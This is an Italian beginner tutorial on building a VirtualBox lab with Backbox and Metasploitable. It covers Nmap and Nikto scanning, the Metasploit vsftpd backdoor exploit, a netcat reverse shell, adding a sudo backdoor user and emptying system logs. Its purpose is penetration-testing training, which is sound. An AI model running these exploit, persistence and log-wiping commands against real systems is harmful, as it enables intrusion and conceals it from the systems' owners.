Questa guida ti accompagnerà passo dopo passo nell'installazione e configurazione di un ambiente di test per ethical hacking utilizzando Backbox come sistema operativo host e Metasploitable come macchina vulnerabile su VirtualBox. Include tutte le 5 fasi dell'ethical hacking: Reconnaissance, Scanning, Gaining Access, Maintaining Access, e Clearing Tracks.
L'obiettivo di questa guida è fornire un percorso completo, comprensibile anche a un principiante, per eseguire un ciclo completo di ethical hacking. Seguendo questa guida, potrai:
- Configurare l'ambiente virtuale.
- Sfruttare vulnerabilità presenti su Metasploitable.
- Ottenere accesso persistente.
- Pulire tracce per simulare un comportamento da penetration tester professionista.
Nota Bene: Queste tecniche devono essere utilizzate esclusivamente in ambienti controllati e autorizzati.
- Scarica VirtualBox dal sito ufficiale: https://www.virtualbox.org/.
- Scarica l'immagine di Metasploitable: https://sourceforge.net/projects/metasploitable/.
- Decomprimi l'archivio e ottieni il file
.vmdk.
- Apri VirtualBox e crea una nuova macchina virtuale:
- Nome:
Metasploitable. - Tipo: Linux.
- Versione: Ubuntu (32-bit).
- RAM: Assegna almeno 512 MB.
- Nome:
- Collega il disco virtuale
.vmdk:- Vai su Impostazioni > Archiviazione.
- Aggiungi il file
.vmdkcome disco rigido esistente.
- Configura la rete:
- Vai su Impostazioni > Rete.
- Imposta la scheda di rete su Scheda con Bridge.
- Modalità promiscua: Consenti tutto.
- Salva le impostazioni e avvia la macchina.
- Accedi alla macchina Metasploitable.
- Controlla l'indirizzo IP usando:
Prendi nota dell'IP associato a
ifconfig
eth0. - Controlla l'indirizzo IP del tuo sistema Backbox:
Prendi nota dell'indirizzo IP associato alla rete configurata.
ifconfig
- Assicurati che le due macchine siano sulla stessa rete:
Se il ping non funziona, controlla le impostazioni di rete su VirtualBox.
ping <IP_della_macchina_opposta>
La fase di Reconnaissance consiste nel raccogliere dati dettagliati sul target per identificare potenziali vulnerabilità.
- Esegui una scansione iniziale con Nmap:
nmap -sV <IP_Metasploitable>
- Esegui una scansione approfondita con Nmap:
nmap -sV -A <IP_Metasploitable>
- Analizza specifici servizi come il web server:
nikto -h <IP_Metasploitable>
La fase di Scanning analizza le porte e i servizi per identificare possibili punti di ingresso.
- Effettua una scansione completa:
nmap -p- <IP_Metasploitable>
- Usa script di rilevamento vulnerabilità:
nmap --script vuln <IP_Metasploitable>
- Usa Enum4Linux per enumerare condivisioni Samba e utenti:
enum4linux -a <IP_Metasploitable>
La fase di Gaining Access sfrutta vulnerabilità per ottenere l'accesso al sistema target.
- Avvia Metasploit:
msfconsole
- Usa l'exploit per il servizio FTP vulnerabile:
use exploit/unix/ftp/vsftpd_234_backdoor set RHOST <IP_Metasploitable> exploit
- Verifica di avere una shell attiva:
cat /etc/passwd
La fase di Maintaining Access configura metodi per mantenere il controllo del sistema.
- Configura Metasploit:
use exploit/multi/handler set payload linux/x86/shell_reverse_tcp set LHOST <IP_Backbox> set LPORT 4444 exploit
- Su Metasploitable, esegui:
nc <IP_Backbox> 4444 -e /bin/bash
- Crea un nuovo utente:
sudo useradd -m -s /bin/bash hacker [...msfadmin password...] sudo passwd hacker [...msfadmin password...] [...insert password 2 times...] sudo usermod -aG sudo hacker [...msfadmin password...] su hacker [...password of hacker...]
La fase di Clearing Tracks rimuove tutte le tracce delle attività.
- Svuota i file di log:
> /var/log/auth.log > /var/log/syslog > /var/log/messages
- Verifica che i log siano vuoti:
cat /var/log/auth.log
Seguendo questa guida, hai completato con successo tutte le 5 fasi del processo di ethical hacking. Ora puoi continuare a esercitarti in ambienti più complessi, utilizzando strumenti avanzati come OWASP Top 10 o MITRE ATT&CK. Ricorda di applicare queste tecniche solo in contesti legali e autorizzati.
